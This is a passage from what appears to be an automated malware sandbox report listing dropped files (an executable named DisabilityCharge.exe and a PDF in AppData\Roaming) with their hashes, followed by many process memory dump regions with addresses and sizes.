  Filesize: 60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- C:\Users\Admin\AppData\Roaming\DisabilityCharge.exe
  Filesize: 934KB
MD57def16e0ceea0ad69d53e0e636541dd9
SHA192080bb5ad272cf69f69aa0588856cda4b4b1c28
SHA25635ed65d9919843300db648bf93ae57d7330095eb1ce18d6c6050db88a2e4f297
SHA5129616fb69ed3fd6d59ae060a671c5af86f0d7e1a4e6f8436a9c7244928a2bb1f0a76ec4f1968f77180141493c16a4e1090faf8786ead929c3bd3812f2e09e596a
- C:\Users\Admin\AppData\Roaming\SA160.pdf
  Filesize: 290KB
MD5267489e084b08204ba4f32a865f2afec
SHA17c77753e748b3fc0a1e26687032bbbf575021d91
SHA256449e7d4fef2f0a11f5ccc0698a36d05fbac682791ca6b3ffaafa4605533e6553
SHA5129e0a516257a6491093d05b01bc7d654cacd1fff7be0024d7260e49b7a2edd6afe8a36d3f95815111e294916f0212c5236f1560e67355750da5c80fc7bfc1c6b6
- memory/1392-107-0x000000000A0B0000-0x000000000A0D1000-memory.dmp
  Filesize: 132KB
- memory/1392-207-0x000000000B2D0000-0x000000000B57B000-memory.dmp
  Filesize: 2.7MB
- memory/1544-15-0x00007FFCD1C30000-0x00007FFCD26F1000-memory.dmp
  Filesize: 10.8MB
- memory/1544-11-0x000001D5B6DB0000-0x000001D5B6DC0000-memory.dmp
  Filesize: 64KB
- memory/1544-12-0x000001D5B6DB0000-0x000001D5B6DC0000-memory.dmp
  Filesize: 64KB
- memory/1544-9-0x000001D5D1460000-0x000001D5D1482000-memory.dmp
  Filesize: 136KB
- memory/1544-10-0x00007FFCD1C30000-0x00007FFCD26F1000-memory.dmp
  Filesize: 10.8MB
- memory/3644-231-0x00000000052A0000-0x000000000530D000-memory.dmp
  Filesize: 436KB
- memory/3644-239-0x00000000052A0000-0x000000000530D000-memory.dmp
  Filesize: 436KB
- memory/3644-255-0x00000000063B0000-0x00000000067B0000-memory.dmp
  Filesize: 4.0MB
- memory/3644-245-0x0000000076D20000-0x0000000076F35000-memory.dmp
  Filesize: 2.1MB
- memory/3644-242-0x00007FFCF0010000-0x00007FFCF0205000-memory.dmp
  Filesize: 2.0MB
- memory/3644-243-0x00000000063B0000-0x00000000067B0000-memory.dmp
  Filesize: 4.0MB
- memory/3644-223-0x0000000000D20000-0x0000000000D21000-memory.dmp
  Filesize: 4KB
- memory/3644-224-0x00000000052A0000-0x000000000530D000-memory.dmp
  Filesize: 436KB
- memory/3644-225-0x00000000052A0000-0x000000000530D000-memory.dmp
  Filesize: 436KB
- memory/3644-226-0x00000000052A0000-0x000000000530D000-memory.dmp
  Filesize: 436KB
- memory/3644-228-0x00000000052A0000-0x000000000530D000-memory.dmp
  Filesize: 436KB
- memory/3644-229-0x00000000052A0000-0x000000000530D000-memory.dmp
  Filesize: 436KB
- memory/3644-230-0x00000000052A0000-0x000000000530D000-memory.dmp
  Filesize: 436KB
- memory/3644-241-0x00000000063B0000-0x00000000067B0000-memory.dmp
  Filesize: 4.0MB
- memory/3644-238-0x00000000063B0000-0x00000000067B0000-memory.dmp
  Filesize: 4.0MB
- memory/3644-105-0x00000000777D1000-0x00000000778F1000-memory.dmp
  Filesize: 1.1MB
- memory/3644-240-0x00000000063B0000-0x00000000067B0000-memory.dmp
  Filesize: 4.0MB
- memory/4276-19-0x00007FFCD0BB0000-0x00007FFCD1671000-memory.dmp
  Filesize: 10.8MB
- memory/4276-20-0x0000015B37A30000-0x0000015B37A40000-memory.dmp
  Filesize: 64KB
- memory/4276-21-0x0000015B37A30000-0x0000015B37A40000-memory.dmp
  Filesize: 64KB
- memory/4276-43-0x0000015B37BB0000-0x0000015B37CFE000-memory.dmp
  Filesize: 1.3MB
- memory/4276-50-0x00007FFCD0BB0000-0x00007FFCD1671000-memory.dmp
  Filesize: 10.8MB
- memory/5116-246-0x00000000006E0000-0x00000000006E9000-memory.dmp
  Filesize: 36KB
- memory/5116-249-0x0000000002420000-0x0000000002820000-memory.dmp
  Filesize: 4.0MB
- memory/5116-248-0x0000000002420000-0x0000000002820000-memory.dmp
  Filesize: 4.0MB
- memory/5116-251-0x00007FFCF0010000-0x00007FFCF0205000-memory.dmp
  Filesize: 2.0MB
- memory/5116-254-0x0000000002420000-0x0000000002820000-memory.dmp
  Filesize: 4.0MB
- memory/5116-253-0x0000000076D20000-0x0000000076F35000-memory.dmp
  Filesize: 2.1MB
- memory/5116-256-0x0000000002420000-0x0000000002820000-memory.dmp
  Filesize: 4.0MB